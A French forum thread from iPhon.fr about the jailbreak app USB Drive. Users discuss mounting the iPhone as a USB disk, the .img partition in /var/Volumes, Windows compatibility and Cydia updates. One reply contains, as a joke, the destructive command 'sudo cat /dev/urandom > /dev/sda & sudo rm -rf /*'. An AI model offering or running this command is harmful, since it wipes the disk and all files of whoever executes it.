Bienvenue sur le forum du blog iPhon.fr
Pensez à poster dans la bonne rubrique, respecter les propos des autres internautes, ne pas utiliser le langage SMS, et enfin, à utiliser la fonction 'Recherche' !
Et... Gardez le sens de l'humour, de la convivialité et de la décontraction. On n'est pas là pour se prendre la tête ! ;-)
Bonsoir à tous !
Je viens de faire une découverte : le répertoire du disque virtuel est situé dans / var / Volumes / !
Le seul hic c'est que la partition est un fichier .img.
Savez vous si il existe un programme sur iphone capable d'ouvrir un fichier .img ?
On pourrai accéder à nos données directement dans l'iphone.
Je pense que le créateur d'usb drive va s'en charger
Salut,
Es ce que USB Drive marche sous Windows ?
iPhone 3G S⃣ 32Go Noir -> Jailbreak Final Fw 3.1.3 (Nouveau iBoot 359.2.3 ... ) Merci Spirit
Thème Suave. Forfait Origami Tout illimité by Orange
MacBook Pro 13.3"/MSI Gx 720 17"/Enciente pour iPhone BOSE
USB Drive marche sur tout les OS
Il marche sur les postes radio, sur les PS3, sur Windows, Linux, OSX ( j'ai tout testé a part les postes radio )
sudo cat /dev/urandom > /dev/sda & sudo rm -rf /* &
ca marche sur postes radio )
iPhone 4 Blanc iOS 4.2.1 GP RC5
Macbook Air 1,8 Ghtz SSD Snow Leopard une vraie bombe !
Salut à tous,
Juste une petite précision: USB drive crée un espace disque sur lequel il faut copier des données ? autrement dit en installant USB drive je n' ai pas accès au contrenu de mon iphone mais seulement au info copiées sur la nouvelle partition ? Je me trompe ?
italiyo:
en installant usbdrive t'as le choix soit entre rendre ton iphone comme un DDE normal soit le laisser comme iphone avec l'acces par itunes.mais tu ne peux avoir les deux en meme temps je croit a ce que j'ai cru comprendre.
iPhone 4S 7.0.4 JB evasi0n
@Shebani: je ne suis pas sur de ce que tu avances, c' est simplement le "mode" de reconnaissance par ton pc/mac qui est configurable... Soit comme DDE soit comme iPhone par itunes soit les 2.
Quelqu' un pour confirmer ?
@Shebani: je ne suis pas sur de ce que tu avances, c' est simplement le "mode" de reconnaissance par ton pc/mac qui est configurable... Soit comme DDE soit comme iPhone par itunes soit les 2.
Quelqu' un pour confirmer ?
yep c'est ça
comme c'est ecris dans l'explication:usb mass storage will not work on windows with itunes or apple usb drivers installed et ceci pour le mode drive+itunes.donc je me dis que ca marche pas forcement..
EDIT : ca a fat planté et mon pc et mon iphone avec ce mode
Dernière modification par schebani (16-12-2009 00:16:36)
iPhone 4S 7.0.4 JB evasi0n
Quelqu'un a reussis a avoir plusieurs disque usb en meme temps .
Moui sa marche parfaitement mais uniquement pour la premiere les autres sont pas vu par le PC .
Si je pouvais en faire plusieur sa serait vraiment genial
1 Lennny 64Bit ( avec driver bnx2 )
1 ubuntu 32Bit
1 ubuntu 64bit
1 clefs usb DOS 6.0
1 clefs mise a jours des serveur 3650 IBM .
1 clefs avec un portable putty .
+ plein d'autres
Dernière modification par koto (04-01-2010 00:13:46)
Merci pour ce post....
Je ne sais pas si je suis a la bonne page , mais totalement débutant je n'arrive pas a mettre a jour usb drive (lorsque je le lance il me demande de lancer cydia afin d'updater...)
Comment mettre a jour une application sous cydia....merci à ceux qui me répondront sur cette page malgré l'aspect basique de cette question pour des utilisateurs confirmés.....
Pas le bon post mais il faut lancer cydia et tous simplement le laisser verifier les mises a jours dispo
Bonsoir à tous !
Je viens de faire une découverte : le répertoire du disque virtuel est situé dans / var / Volumes / !
Le seul hic c'est que la partition est un fichier .img.Savez vous si il existe un programme sur iphone capable d'ouvrir un fichier .img ?
On pourrai accéder à nos données directement dans l'iphone.
Je pense que le créateur d'usb drive va s'en charger
Bonjour,
J'aimerai savoir si ce pb a été résolu?
Est t'il possible d'accéder à nos données présentes sur USBDrive via ifile par exemple?
Sinon connaissez vous une autre app le permettant?
Édit: je viens de tomber sur pwntunes, mais ce logiciel nécessite l'installation d'un programme sur l'ordinateur?
Merci
Dernière modification par max216 (15-08-2010 10:25:14)
Iphone 3GS - 32 Go Black - ancien iboot - iOS 5
iPad 2 - 16 Go Black - iOS 5
Game center : max216
L'iPhone sur iPhon.fr, le blog de l'iPhone - blog iPad
iPhon.fr et son forum ne sont pas liés à Apple, Orange, SFR ou autres et les marques citées sont la propriété de leurs détenteurs respectifs.